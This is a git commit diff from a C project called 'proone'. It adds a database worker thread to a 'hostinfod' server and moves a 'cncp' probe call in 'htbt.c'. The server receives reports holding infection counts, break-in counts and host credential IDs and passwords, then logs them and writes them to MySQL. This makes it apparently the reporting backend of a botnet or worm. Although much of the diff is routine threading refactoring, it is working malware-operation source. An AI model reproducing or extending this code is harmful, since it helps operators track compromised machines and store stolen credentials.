aboutsummaryrefslogtreecommitdiff
path: root/src
diff options
context:
space:
mode:
authorDavid Timber <mieabby@gmail.com>2021-04-09 22:41:00 +1000
committerDavid Timber <mieabby@gmail.com>2021-04-09 22:56:57 +1000
commitf91419f6b3400a6b73f7d2b3c7b8044b6aa490db (patch)
treeb1a029a8d31a9ae79d6988d7b1cb64875ec0b8a6 /src
parentd99b1309b1c699103c26b316a373a64f5342b905 (diff)
Impl hostinfod, htbt
* htbt: Call `htbt_cncp_do_probe()` right after start * hostinfod: impl DB thread
Diffstat (limited to 'src')
-rw-r--r--src/data/hostinfod.conf.sample1
-rw-r--r--src/htbt.c4
-rw-r--r--src/proone-hostinfod.c641
3 files changed, 387 insertions, 259 deletions
diff --git a/src/data/hostinfod.conf.sample b/src/data/hostinfod.conf.sample
index 36c577e..fd94c9b 100644
--- a/src/data/hostinfod.conf.sample
+++ b/src/data/hostinfod.conf.sample
@@ -13,6 +13,7 @@ hostinfod:
# key_pw: ""
dh: "hostinfod-dh.pem"
# max_conn: 0
+ # db_q_size: 0
report_int: 60000
sck_op_timeout: 5000
# nb_thread:
diff --git a/src/htbt.c b/src/htbt.c
index 28f49c3..c74adf8 100644
--- a/src/htbt.c
+++ b/src/htbt.c
@@ -2071,6 +2071,8 @@ static void *htbt_cncp_entry (void *p) {
pth_event_t ev = NULL;
while (ctx->loop_flag) {
+ htbt_cncp_do_probe(ctx);
+
// calc interval variance
intvar = 0; // ignore failure of mbedtls_ctr_drbg_random()
mbedtls_ctr_drbg_random(
@@ -2090,8 +2092,6 @@ static void *htbt_cncp_entry (void *p) {
pth_cond_await(&ctx->cncp.cond, &ctx->cncp.lock, ev);
}
pth_mutex_release(&ctx->cncp.lock);
-
- htbt_cncp_do_probe(ctx);
}
pth_event_free(ev, FALSE);
diff --git a/src/proone-hostinfod.c b/src/proone-hostinfod.c
index 0940258..f9e2d89 100644
--- a/src/proone-hostinfod.c
+++ b/src/proone-hostinfod.c
@@ -42,6 +42,11 @@ typedef enum {
} client_state_t;
typedef struct {
+ prne_htbt_host_info_t hi;
+ struct sockaddr_in6 sa;
+} db_qe_t;
+
+typedef struct {
struct timespec last_op;
prne_iobuf_t ib[2];
int sck;
@@ -67,8 +72,18 @@ typedef struct {
bool term;
} th_ctx_t;
+typedef struct {
+ prne_llist_t q;
+ pthread_t th;
+ pthread_mutex_t lock;
+ pthread_cond_t cv;
+ MYSQL c;
+ bool term;
+} db_ctx_t;
+
static const uint16_t DEFCONF_DB_PORT = 3306;
static const size_t DEFCONF_MAX_CONN = SIZE_MAX;
+static const size_t DEFCONF_DB_Q_SIZE = SIZE_MAX;
static const struct timespec DEFCONF_REPORT_INT = { 60, 0 };
static const struct timespec DEFCONF_SCK_OP_TIMEOUT = { 5, 0 };
static const unsigned int DEFCONF_BACKLOG = 10;
@@ -92,6 +107,7 @@ struct {
char *key_pw;
} ssl;
size_t max_conn;
+ size_t db_q_size;
struct timespec report_int;
struct timespec sck_op_timeout;
unsigned int nb_thread;
@@ -101,10 +117,7 @@ struct {
} prog_conf;
struct {
- struct {
- MYSQL c;
- pthread_mutex_t lock;
- } db;
+ db_ctx_t db_ctx;
struct {
mbedtls_x509_crt ca;
mbedtls_x509_crt crt;
@@ -142,6 +155,7 @@ static void set_def_prog_param (void) {
prog_conf.db.tbl_pfx = prne_dup_str("prne-");
prog_conf.db.port = DEFCONF_DB_PORT;
prog_conf.max_conn = DEFCONF_MAX_CONN;
+ prog_conf.db_q_size = DEFCONF_DB_Q_SIZE;
prog_conf.report_int = DEFCONF_REPORT_INT;
prog_conf.sck_op_timeout = DEFCONF_SCK_OP_TIMEOUT;
prog_conf.nb_thread = get_hwconc();
@@ -254,6 +268,9 @@ static bool yaml_parse_handle_node (
else if (strcmp(ctx->path, "/hostinfod/max_conn") == 0) {
ctx->err = sscanf((const char*)val, "%zu", &prog_conf.max_conn) != 1;
}
+ else if (strcmp(ctx->path, "/hostinfod/db_q_size") == 0) {
+ ctx->err = sscanf((const char*)val, "%zu", &prog_conf.db_q_size) != 1;
+ }
else if (strcmp(ctx->path, "/hostinfod/report_int") == 0) {
unsigned long tmp;
@@ -445,6 +462,7 @@ static int setup_conf (const char *conf_path) {
prne_nstrlen(prog_conf.ssl.path_key) > 0);
ERR_BREAK("`ssl.dh` not set", prne_nstrlen(prog_conf.ssl.path_dh) > 0);
ERR_BREAK("invalid `max_conn`", prog_conf.max_conn > 0);
+ ERR_BREAK("invalid `db_q_size`", prog_conf.db_q_size > 0);
ERR_BREAK(
"invalid `sck_op_timeout`",
prne_cmp_timespec(prog_conf.sck_op_timeout, ZERO_TIMESPEC) > 0);
@@ -515,9 +533,9 @@ ERR:
return -1;
}
-static void report_mysql_err (void) {
+static void report_mysql_err (MYSQL *c) {
pthread_mutex_lock(&prog_g.stdio_lock);
- fprintf(stderr, "* MySQL: %s\n", mysql_error(&prog_g.db.c));
+ fprintf(stderr, "* MySQL: %s\n", mysql_error(c));
pthread_mutex_unlock(&prog_g.stdio_lock);
}
@@ -546,10 +564,10 @@ static int init_global (void) {
}
bov = true;
- mysql_options(&prog_g.db.c, MYSQL_OPT_RECONNECT, &bov);
- mysql_options(&prog_g.db.c, MYSQL_SET_CHARSET_NAME, "utf8");
+ mysql_options(&prog_g.db_ctx.c, MYSQL_OPT_RECONNECT, &bov);
+ mysql_options(&prog_g.db_ctx.c, MYSQL_SET_CHARSET_NAME, "utf8");
if (mysql_real_connect(
- &prog_g.db.c,
+ &prog_g.db_ctx.c,
prog_conf.db.host,
prog_conf.db.user,
prog_conf.db.pw,
@@ -559,7 +577,7 @@ static int init_global (void) {
CLIENT_MULTI_STATEMENTS) == NULL)
{
if (prog_conf.verbose >= PRNE_VL_FATAL) {
- report_mysql_err();
+ report_mysql_err(&prog_g.db_ctx.c);
}
return 1;
}
@@ -666,142 +684,6 @@ static void init_signals (void) {
signal(SIGTERM, handle_termsig);
}
-static void free_client_ctx (client_ctx_t *ctx) {
- prne_free_iobuf(ctx->ib + 0);
- prne_free_iobuf(ctx->ib + 1);
- prne_close(ctx->sck);
- mbedtls_ssl_free(&ctx->ssl);
-}
-
-static void incre_conn_ctr (const ssize_t n) {
- pthread_mutex_lock(&prog_g.conn_ctr.lock);
- prog_g.conn_ctr.cnt += n;
- pthread_mutex_unlock(&prog_g.conn_ctr.lock);
-}
-
-static prne_llist_entry_t *pop_client_ctx (
- th_ctx_t *ctx,
- prne_llist_entry_t *e)
-{
- client_ctx_t *c = (client_ctx_t*)e->element;
- prne_llist_entry_t *ret;
-
- free_client_ctx(c);
- prne_free(c);
- ret = prne_llist_erase(&ctx->c_list, e);
- incre_conn_ctr(-1);
-
- return ret;
-}
-
-static bool resize_pfd_arr (th_ctx_t *ctx, const size_t ny_size) {
- void *ny = prne_realloc(
- ctx->pfd,
- sizeof(struct pollfd),
- ny_size);
-
- if (ny_size > 0 && ny == NULL) {
- if (prog_conf.verbose >= PRNE_VL_ERR) {
- sync_perror("** resize_pfd_arr()");
- }
- return false;
- }
- ctx->pfd = (struct pollfd*)ny;
- return true;
-}
-
-static void client_sync_msg (client_ctx_t *c, const char *msg) {
- pthread_mutex_lock(&prog_g.stdio_lock);
- fprintf(stderr, "client@%"PRIxPTR": %s\n", (uintptr_t)c, msg);
- pthread_mutex_unlock(&prog_g.stdio_lock);
-}
-
-static void client_sync_perror (client_ctx_t *c, const char *msg) {
- pthread_mutex_lock(&prog_g.stdio_lock);
- fprintf(
- stderr,
- "client@%"PRIxPTR" %s: %s\n",
- (uintptr_t)c,
- msg,
- strerror(errno));
- pthread_mutex_unlock(&prog_g.stdio_lock);
-}
-
-static void client_sync_mbedtls_err (
- const int err,
- const char *msg,
- const uintptr_t c)
-{
- char str[256];
-
- str[0] = 0;
- mbedtls_strerror(err, str, sizeof(str));
- pthread_mutex_lock(&prog_g.stdio_lock);
- fprintf(
- stderr,
- "client@%"PRIxPTR" %s: %s\n",
- c,
- msg,
- str);
- pthread_mutex_unlock(&prog_g.stdio_lock);
-}
-
-static bool fab_client_status_rsp (
- client_ctx_t *c,
- const uint16_t id,
- const prne_htbt_status_code_t code,
- const int32_t err)
-{
- prne_htbt_msg_head_t mh;
- prne_htbt_status_t status;
- size_t msg_len = 0;
- size_t actual;
- bool ret;
-
- prne_htbt_init_msg_head(&mh);
- prne_htbt_init_status(&status);
- mh.is_rsp = true;
- mh.id = id;
- mh.op = PRNE_HTBT_OP_STATUS;
- status.code = code;
- status.err = err;
-
- prne_htbt_ser_msg_head(NULL, 0, &actual, &mh);
- msg_len += actual;
- prne_htbt_ser_status(NULL, 0, &actual, &status);
- msg_len += actual;
-
- if (prne_alloc_iobuf(c->ib + 1, msg_len)) {
- prne_iobuf_zero(c->ib + 1);
-
- prne_htbt_ser_msg_head(
- c->ib[1].m + c->ib[1].len,
- c->ib[1].avail,
- &actual,
- &mh);
- prne_iobuf_shift(c->ib + 1, actual);
- prne_htbt_ser_status(
- c->ib[1].m + c->ib[1].len,
- c->ib[1].avail,
- &actual,
- &status);
- prne_iobuf_shift(c->ib + 1, actual);
-
- ret = true;
- }
- else {
- ret = false;
- if (prog_conf.verbose >= PRNE_VL_ERR) {
- client_sync_perror(c, "** proc_client_stream()");
- }
- }
-
- prne_htbt_free_msg_head(&mh);
- prne_htbt_free_status(&status);
-
- return ret;
-}
-
static int build_hostinfo_query_str (
const prne_htbt_host_info_t *hi,
const struct sockaddr_in6 *sa,
@@ -938,9 +820,15 @@ static int build_hostinfo_query_str (
prog_conf.db.tbl_pfx);
}
-static bool handle_hostinfo (
- client_ctx_t *client,
- const prne_htbt_host_info_t *hi)
+static void db_sync_msg (db_ctx_t *c, const char *msg) {
+ pthread_mutex_lock(&prog_g.stdio_lock);
+ fprintf(stderr, "db@%"PRIxPTR": %s\n", (uintptr_t)c, msg);
+ pthread_mutex_unlock(&prog_g.stdio_lock);
+}
+
+static bool handle_db_qe (
+ db_ctx_t *ctx,
+ const db_qe_t *e)
{
struct {
char *cred_id;
@@ -959,8 +847,8 @@ static bool handle_hostinfo (
// TRY
if (prne_dec_host_cred(
- hi->host_cred,
- hi->host_cred_len,
+ e->hi.host_cred,
+ e->hi.host_cred_len,
&hc) == PRNE_HTBT_SER_RC_OK)
{
unsigned long len;
@@ -981,7 +869,7 @@ static bool handle_hostinfo (
qv.cred_id[0] = '\'';
len = mysql_real_escape_string(
- &prog_g.db.c,
+ &ctx->c,
qv.cred_id + 1,
hc.id,
cred_l[0]);
@@ -990,7 +878,7 @@ static bool handle_hostinfo (
qv.cred_pw[0] = '\'';
len = mysql_real_escape_string(
- &prog_g.db.c,
+ &ctx->c,
qv.cred_pw + 1,
hc.pw,
cred_l[1]);
@@ -1005,7 +893,7 @@ static bool handle_hostinfo (
}
}
- arch_str = prne_arch_tostr(hi->arch);
+ arch_str = prne_arch_tostr(e->hi.arch);
if (arch_str != NULL) {
const char *sb[] = { "'", arch_str, "'" };
qv.arch = prne_build_str(sb, sizeof(sb)/sizeof(const char*));
@@ -1036,7 +924,7 @@ static bool handle_hostinfo (
pthread_mutex_lock(&prog_g.stdio_lock);
fprintf(
stderr,
- "client@%"PRIxPTR" [%s]:%"PRIu16" hostinfo("
+ "db@%"PRIxPTR": hostinfo("
"parent_uptime = %"PRIu64", "
"child_uptime = %"PRIu64", "
"bne_cnt = %"PRIu64", "
@@ -1050,73 +938,71 @@ static bool handle_hostinfo (
"host_cred.pw = %s, "
"crash_cnt = %"PRIu32", "
"arch = '%s')\n",
- (uintptr_t)client,
- client->ipaddr_str,
- ntohs(client->sa.sin6_port),
- hi->parent_uptime,
- hi->child_uptime,
- hi->bne_cnt,
- hi->infect_cnt,
- hi->parent_pid,
- hi->child_pid,
- hi->prog_ver[0],
- hi->prog_ver[1],
- hi->prog_ver[2],
- hi->prog_ver[3],
- hi->prog_ver[4],
- hi->prog_ver[5],
- hi->prog_ver[6],
- hi->prog_ver[7],
- hi->prog_ver[8],
- hi->prog_ver[9],
- hi->prog_ver[10],
- hi->prog_ver[11],
- hi->prog_ver[12],
- hi->prog_ver[13],
- hi->prog_ver[14],
- hi->prog_ver[15],
- hi->boot_id[0],
- hi->boot_id[1],
- hi->boot_id[2],
- hi->boot_id[3],
- hi->boot_id[4],
- hi->boot_id[5],
- hi->boot_id[6],
- hi->boot_id[7],
- hi->boot_id[8],
- hi->boot_id[9],
- hi->boot_id[10],
- hi->boot_id[11],
- hi->boot_id[12],
- hi->boot_id[13],
- hi->boot_id[14],
- hi->boot_id[15],
- hi->instance_id[0],
- hi->instance_id[1],
- hi->instance_id[2],
- hi->instance_id[3],
- hi->instance_id[4],
- hi->instance_id[5],
- hi->instance_id[6],
- hi->instance_id[7],
- hi->instance_id[8],
- hi->instance_id[9],
- hi->instance_id[10],
- hi->instance_id[11],
- hi->instance_id[12],
- hi->instance_id[13],
- hi->instance_id[14],
- hi->instance_id[15],
+ (uintptr_t)ctx,
+ e->hi.parent_uptime,
+ e->hi.child_uptime,
+ e->hi.bne_cnt,
+ e->hi.infect_cnt,
+ e->hi.parent_pid,
+ e->hi.child_pid,
+ e->hi.prog_ver[0],
+ e->hi.prog_ver[1],
+ e->hi.prog_ver[2],
+ e->hi.prog_ver[3],
+ e->hi.prog_ver[4],
+ e->hi.prog_ver[5],
+ e->hi.prog_ver[6],
+ e->hi.prog_ver[7],
+ e->hi.prog_ver[8],
+ e->hi.prog_ver[9],
+ e->hi.prog_ver[10],
+ e->hi.prog_ver[11],
+ e->hi.prog_ver[12],
+ e->hi.prog_ver[13],
+ e->hi.prog_ver[14],
+ e->hi.prog_ver[15],
+ e->hi.boot_id[0],
+ e->hi.boot_id[1],
+ e->hi.boot_id[2],
+ e->hi.boot_id[3],
+ e->hi.boot_id[4],
+ e->hi.boot_id[5],
+ e->hi.boot_id[6],
+ e->hi.boot_id[7],
+ e->hi.boot_id[8],
+ e->hi.boot_id[9],
+ e->hi.boot_id[10],
+ e->hi.boot_id[11],
+ e->hi.boot_id[12],
+ e->hi.boot_id[13],
+ e->hi.boot_id[14],
+ e->hi.boot_id[15],
+ e->hi.instance_id[0],
+ e->hi.instance_id[1],
+ e->hi.instance_id[2],
+ e->hi.instance_id[3],
+ e->hi.instance_id[4],
+ e->hi.instance_id[5],
+ e->hi.instance_id[6],
+ e->hi.instance_id[7],
+ e->hi.instance_id[8],
+ e->hi.instance_id[9],
+ e->hi.instance_id[10],
+ e->hi.instance_id[11],
+ e->hi.instance_id[12],
+ e->hi.instance_id[13],
+ e->hi.instance_id[14],
+ e->hi.instance_id[15],
pr[0],
pr[1],
- hi->crash_cnt,
+ e->hi.crash_cnt,
qv.arch);
pthread_mutex_unlock(&prog_g.stdio_lock);
}
f_ret = build_hostinfo_query_str(
- hi,
- &client->sa,
+ &e->hi,
+ &e->sa,
qv.cred_id,
qv.cred_pw,
qv.arch,
@@ -1131,42 +1017,38 @@ static bool handle_hostinfo (
}
q_len = (size_t)f_ret;
build_hostinfo_query_str(
- hi,
- &client->sa,
+ &e->hi,
+ &e->sa,
qv.cred_id,
qv.cred_pw,
qv.arch,
q_str,
q_len + 1);
if (prog_conf.verbose >= PRNE_VL_DBG0 + 2) {
- client_sync_msg(client, q_str);
+ db_sync_msg(ctx, q_str);
}
ret = true;
- pthread_mutex_lock(&prog_g.db.lock);
- {
- if (mysql_real_query(&prog_g.db.c, q_str, q_len)) {
- goto SQL_ERR;
+ if (mysql_real_query(&ctx->c, q_str, q_len)) {
+ goto SQL_ERR;
+ }
+ while (true) {
+ f_ret = mysql_next_result(&ctx->c);
+ if (f_ret == 0) {
+ continue;
}
- while (true) {
- f_ret = mysql_next_result(&prog_g.db.c);
- if (f_ret == 0) {
- continue;
- }
- else if (f_ret == -1) {
- break;
- }
- else {
- goto SQL_ERR;
- }
+ else if (f_ret == -1) {
+ break;
}
- sql_err = false;
-SQL_ERR:
- if (sql_err && prog_conf.verbose >= PRNE_VL_ERR) {
- report_mysql_err();
+ else {
+ goto SQL_ERR;
}
}
- pthread_mutex_unlock(&prog_g.db.lock);
+ sql_err = false;
+SQL_ERR:
+ if (sql_err && prog_conf.verbose >= PRNE_VL_ERR) {
+ report_mysql_err(&ctx->c);
+ }
END: // CATCH
prne_free_host_cred(&hc);
@@ -1178,6 +1060,233 @@ END: // CATCH
return ret;
}
+static void *db_thread_main (void *ctx_p) {
+ db_ctx_t *ctx = (db_ctx_t*)ctx_p;
+
+ assert(!mysql_thread_init());
+
+ if (prog_conf.verbose >= PRNE_VL_DBG0) {
+ db_sync_msg(ctx, "Loop start.");
+ }
+
+ while (true) {
+ db_qe_t *e;
+
+ pthread_mutex_lock(&ctx->lock);
+ if (ctx->q.size == 0) {
+ if (ctx->term) {
+ pthread_mutex_unlock(&ctx->lock);
+ break;
+ }
+ pthread_cond_wait(&ctx->cv, &ctx->lock);
+ }
+ if (ctx->q.head != NULL) {
+ e = (db_qe_t*)ctx->q.head->element;
+ prne_llist_erase(&ctx->q, ctx->q.head);
+ }
+ else {
+ e = NULL;
+ }
+ pthread_mutex_unlock(&ctx->lock);
+
+ if (e != NULL) {
+ handle_db_qe(ctx, e);
+
+ prne_htbt_free_host_info(&e->hi);
+ prne_free(e);
+ }
+ }
+
+ if (prog_conf.verbose >= PRNE_VL_DBG0) {
+ db_sync_msg(ctx, "Loop end.");
+ }
+
+ mysql_thread_end();
+
+ return NULL;
+}
+
+static void free_client_ctx (client_ctx_t *ctx) {
+ prne_free_iobuf(ctx->ib + 0);
+ prne_free_iobuf(ctx->ib + 1);
+ prne_close(ctx->sck);
+ mbedtls_ssl_free(&ctx->ssl);
+}
+
+static void incre_conn_ctr (const ssize_t n) {
+ pthread_mutex_lock(&prog_g.conn_ctr.lock);
+ prog_g.conn_ctr.cnt += n;
+ pthread_mutex_unlock(&prog_g.conn_ctr.lock);
+}
+
+static prne_llist_entry_t *pop_client_ctx (
+ th_ctx_t *ctx,
+ prne_llist_entry_t *e)
+{
+ client_ctx_t *c = (client_ctx_t*)e->element;
+ prne_llist_entry_t *ret;
+
+ free_client_ctx(c);
+ prne_free(c);
+ ret = prne_llist_erase(&ctx->c_list, e);
+ incre_conn_ctr(-1);
+
+ return ret;
+}
+
+static bool resize_pfd_arr (th_ctx_t *ctx, const size_t ny_size) {
+ void *ny = prne_realloc(
+ ctx->pfd,
+ sizeof(struct pollfd),
+ ny_size);
+
+ if (ny_size > 0 && ny == NULL) {
+ if (prog_conf.verbose >= PRNE_VL_ERR) {
+ sync_perror("** resize_pfd_arr()");
+ }
+ return false;
+ }
+ ctx->pfd = (struct pollfd*)ny;
+ return true;
+}
+
+static void client_sync_msg (client_ctx_t *c, const char *msg) {
+ pthread_mutex_lock(&prog_g.stdio_lock);
+ fprintf(stderr, "client@%"PRIxPTR": %s\n", (uintptr_t)c, msg);
+ pthread_mutex_unlock(&prog_g.stdio_lock);
+}
+
+static void client_sync_perror (client_ctx_t *c, const char *msg) {
+ pthread_mutex_lock(&prog_g.stdio_lock);
+ fprintf(
+ stderr,
+ "client@%"PRIxPTR" %s: %s\n",
+ (uintptr_t)c,
+ msg,
+ strerror(errno));
+ pthread_mutex_unlock(&prog_g.stdio_lock);
+}
+
+static void client_sync_mbedtls_err (
+ const int err,
+ const char *msg,
+ const uintptr_t c)
+{
+ char str[256];
+
+ str[0] = 0;
+ mbedtls_strerror(err, str, sizeof(str));
+ pthread_mutex_lock(&prog_g.stdio_lock);
+ fprintf(
+ stderr,
+ "client@%"PRIxPTR" %s: %s\n",
+ c,
+ msg,
+ str);
+ pthread_mutex_unlock(&prog_g.stdio_lock);
+}
+
+static bool fab_client_status_rsp (
+ client_ctx_t *c,
+ const uint16_t id,
+ const prne_htbt_status_code_t code,
+ const int32_t err)
+{
+ prne_htbt_msg_head_t mh;
+ prne_htbt_status_t status;
+ size_t msg_len = 0;
+ size_t actual;
+ bool ret;
+
+ prne_htbt_init_msg_head(&mh);
+ prne_htbt_init_status(&status);
+ mh.is_rsp = true;
+ mh.id = id;
+ mh.op = PRNE_HTBT_OP_STATUS;
+ status.code = code;
+ status.err = err;
+
+ prne_htbt_ser_msg_head(NULL, 0, &actual, &mh);
+ msg_len += actual;
+ prne_htbt_ser_status(NULL, 0, &actual, &status);
+ msg_len += actual;
+
+ if (prne_alloc_iobuf(c->ib + 1, msg_len)) {
+ prne_iobuf_zero(c->ib + 1);
+
+ prne_htbt_ser_msg_head(
+ c->ib[1].m + c->ib[1].len,
+ c->ib[1].avail,
+ &actual,
+ &mh);
+ prne_iobuf_shift(c->ib + 1, actual);
+ prne_htbt_ser_status(
+ c->ib[1].m + c->ib[1].len,
+ c->ib[1].avail,
+ &actual,
+ &status);
+ prne_iobuf_shift(c->ib + 1, actual);
+
+ ret = true;
+ }
+ else {
+ ret = false;
+ if (prog_conf.verbose >= PRNE_VL_ERR) {
+ client_sync_perror(c, "** proc_client_stream()");
+ }
+ }
+
+ prne_htbt_free_msg_head(&mh);
+ prne_htbt_free_status(&status);
+
+ return ret;
+}
+
+static bool queue_hostinfo (
+ client_ctx_t *client,
+ prne_htbt_host_info_t *hi)
+{
+ bool ret = false;
+ db_qe_t *qe = (db_qe_t*)prne_malloc(sizeof(db_qe_t), 1);
+ pthread_mutex_t *lock = NULL;
+
+ if (qe == NULL) {
+ goto END;
+ }
+
+ memcpy(&qe->hi, hi, sizeof(prne_htbt_host_info_t));
+ memcpy(&qe->sa, &client->sa, sizeof(struct sockaddr_in6));
+
+ pthread_mutex_lock(&prog_g.db_ctx.lock);
+ lock = &prog_g.db_ctx.lock;
+ if (prog_g.db_ctx.q.size > prog_conf.db_q_size) {
+ if (prog_conf.verbose >= PRNE_VL_WARN) {
+ client_sync_msg(client, "** DB queue full!");
+ }
+ goto END;
+ }
+ if (prne_llist_append(&prog_g.db_ctx.q, (prne_llist_element_t)qe) == NULL) {
+ if (prog_conf.verbose >= PRNE_VL_ERR) {
+ client_sync_perror(client, "prne_llist_append()");
+ }
+ goto END;
+ }
+ pthread_cond_broadcast(&prog_g.db_ctx.cv);
+ pthread_mutex_unlock(lock);
+ lock = NULL;
+
+ qe = NULL;
+ prne_htbt_init_host_info(hi);
+ ret = true;
+END:
+ if (lock != NULL) {
+ pthread_mutex_unlock(lock);
+ }
+ prne_free(qe);
+
+ return ret;
+}
+
static int proc_client_hostinfo (
th_ctx_t *ctx,
client_ctx_t *c,
@@ -1204,9 +1313,9 @@ static int proc_client_hostinfo (
prne_iobuf_shift(c->ib + 0, -(off + actual));
c->proto_state.hi_received = true;
c->con_state = CS_CLOSE;
- if (!handle_hostinfo(c, &hi)) {
+ if (!queue_hostinfo(c, &hi)) {
if (prog_conf.verbose >= PRNE_VL_ERR) {
- client_sync_perror(c, "** handle_hostinfo");
+ client_sync_perror(c, "** queue_hostinfo()");
}
}
break;
@@ -1459,7 +1568,7 @@ static int serve_client (
return ret;
}
-static void thread_tick (th_ctx_t *ctx) {
+static void client_thread_tick (th_ctx_t *ctx) {
const struct timespec now = prne_gettime(CLOCK_MONOTONIC);
nfds_t pfd_ptr;
int f_ret;
@@ -1621,7 +1730,7 @@ static void thread_tick (th_ctx_t *ctx) {
if (f_ret < 0) {
if (errno != EINTR) {
if (prog_conf.verbose >= PRNE_VL_FATAL) {
- sync_perror("*** poll()@thread_tick()");
+ sync_perror("*** poll()@client_thread_tick()");
}
abort();
}
@@ -1691,15 +1800,14 @@ ERR: // CATCH
prne_llist_clear(&ctx->p_list);
}
-static void *thread_main (void *ctx_p) {
+static void *client_thread_main (void *ctx_p) {
th_ctx_t *ctx = (th_ctx_t*)ctx_p;
- assert(!mysql_thread_init());
if (prog_conf.verbose >= PRNE_VL_DBG0) {
pthread_mutex_lock(&prog_g.stdio_lock);
fprintf(
stderr,
- "th@%"PRIxPTR" initialised. Loop start.\n",
+ "c_th@%"PRIxPTR": Loop start.\n",
(uintptr_t)ctx);
pthread_mutex_unlock(&prog_g.stdio_lock);
}
@@ -1721,14 +1829,14 @@ static void *thread_main (void *ctx_p) {
abort();
}
- thread_tick(ctx);
+ client_thread_tick(ctx);
}
if (prog_conf.verbose >= PRNE_VL_DBG0) {
pthread_mutex_lock(&prog_g.stdio_lock);
fprintf(
stderr,
- "th@%"PRIxPTR" loop end.\n",
+ "c_th@%"PRIxPTR": Loop end.\n",
(uintptr_t)ctx);
pthread_mutex_unlock(&prog_g.stdio_lock);
}
@@ -1749,6 +1857,15 @@ static int init_threads (
return 1;
}
+ if ((errno = pthread_create(
+ &prog_g.db_ctx.th,
+ NULL,
+ db_thread_main,
+ &prog_g.db_ctx)) != 0)
+ {
+ return 1;
+ }
+
for (size_t i = 0; i < in_cnt; i += 1) {
th_ctx_t *th_ctx = arr + i;
@@ -1780,7 +1897,7 @@ static int init_threads (
if ((errno = pthread_create(
&th_ctx->th,
NULL,
- thread_main,
+ client_thread_main,
th_ctx)) != 0)
{
return 1;
@@ -1800,7 +1917,6 @@ static void join_threads (th_ctx_t **arr, const size_t cnt) {
write(ctx->ihcp[1], &sewage, 1);
pthread_mutex_unlock(&ctx->lock);
}
-
for (size_t i = 0; i < cnt; i += 1) {
th_ctx_t *ctx = *arr + i;
@@ -1811,9 +1927,14 @@ static void join_threads (th_ctx_t **arr, const size_t cnt) {
prne_free_llist(&ctx->c_list);
prne_free_rnd(&ctx->rnd);
}
-
prne_free(*arr);
*arr = NULL;
+
+ pthread_mutex_lock(&prog_g.db_ctx.lock);
+ prog_g.db_ctx.term = true;
+ pthread_cond_broadcast(&prog_g.db_ctx.cv);
+ pthread_mutex_unlock(&prog_g.db_ctx.lock);
+ pthread_join(prog_g.db_ctx.th, NULL);
}
static void pass_client_conn (
@@ -1902,7 +2023,7 @@ static void pass_client_conn (
fprintf(
stderr,
"New client from [%s]:%"PRIu16" "
- "client@%"PRIxPTR", th@%"PRIxPTR", fd:%d\n",
+ "client@%"PRIxPTR", c_th@%"PRIxPTR", fd:%d\n",
c_ctx->ipaddr_str,
ntohs(sa->sin6_port),
(uintptr_t)c_ctx,
@@ -1946,7 +2067,8 @@ int main (const int argc, const char **args) {
return 1;
}
- mysql_init(&prog_g.db.c);
+ mysql_init(&prog_g.db_ctx.c);
+ prne_init_llist(&prog_g.db_ctx.q);
mbedtls_x509_crt_init(&prog_g.ssl.ca);
mbedtls_x509_crt_init(&prog_g.ssl.crt);
mbedtls_pk_init(&prog_g.ssl.key);
@@ -1955,9 +2077,11 @@ int main (const int argc, const char **args) {
mbedtls_entropy_init(&prog_g.ssl.entropy);
mbedtls_ctr_drbg_init(&prog_g.ssl.ctr_drbg);
- if ((errno = pthread_mutex_init(&prog_g.db.lock, NULL)) != 0 ||
+ if ((errno = pthread_mutex_init(&prog_g.db_ctx.lock, NULL)) != 0 ||
(errno = pthread_mutex_init(&prog_g.stdio_lock, NULL)) != 0 ||
- (errno = pthread_mutex_init(&prog_g.conn_ctr.lock, NULL)) != 0)
+ (errno = pthread_mutex_init(&prog_g.conn_ctr.lock, NULL)) != 0 ||
+ (errno = pthread_mutex_init(&prog_g.db_ctx.lock, NULL)) != 0 ||
+ (errno = pthread_cond_init(&prog_g.db_ctx.cv, NULL)) != 0)
{
if (prog_conf.verbose >= PRNE_VL_FATAL) {
perror("*** pthread_mutex_init()");
@@ -1992,7 +2116,7 @@ int main (const int argc, const char **args) {
if (prog_conf.verbose >= PRNE_VL_DBG0) {
pthread_mutex_lock(&prog_g.stdio_lock);
- fprintf(stderr, "Initialisation complete. Loop start.\n");
+ fprintf(stderr, "Initialisation complete. Servicing ...\n");
pthread_mutex_unlock(&prog_g.stdio_lock);
}
@@ -2048,10 +2172,12 @@ END: // CATCH
prne_close(fd);
- mysql_close(&prog_g.db.c);
- pthread_mutex_destroy(&prog_g.db.lock);
+ mysql_close(&prog_g.db_ctx.c);
+ pthread_mutex_destroy(&prog_g.db_ctx.lock);
pthread_mutex_destroy(&prog_g.conn_ctr.lock);
pthread_mutex_destroy(&prog_g.stdio_lock);
+ pthread_mutex_destroy(&prog_g.db_ctx.lock);
+ pthread_cond_destroy(&prog_g.db_ctx.cv);
mbedtls_ssl_config_free(&prog_g.ssl.conf);
mbedtls_x509_crt_free(&prog_g.ssl.ca);
mbedtls_x509_crt_free(&prog_g.ssl.crt);
@@ -2059,6 +2185,7 @@ END: // CATCH
mbedtls_dhm_free(&prog_g.ssl.dh);
mbedtls_ctr_drbg_free(&prog_g.ssl.ctr_drbg);
mbedtls_entropy_free(&prog_g.ssl.entropy);
+ prne_free_llist(&prog_g.db_ctx.q);
free_conf();
prne_close(sigpipe[0]);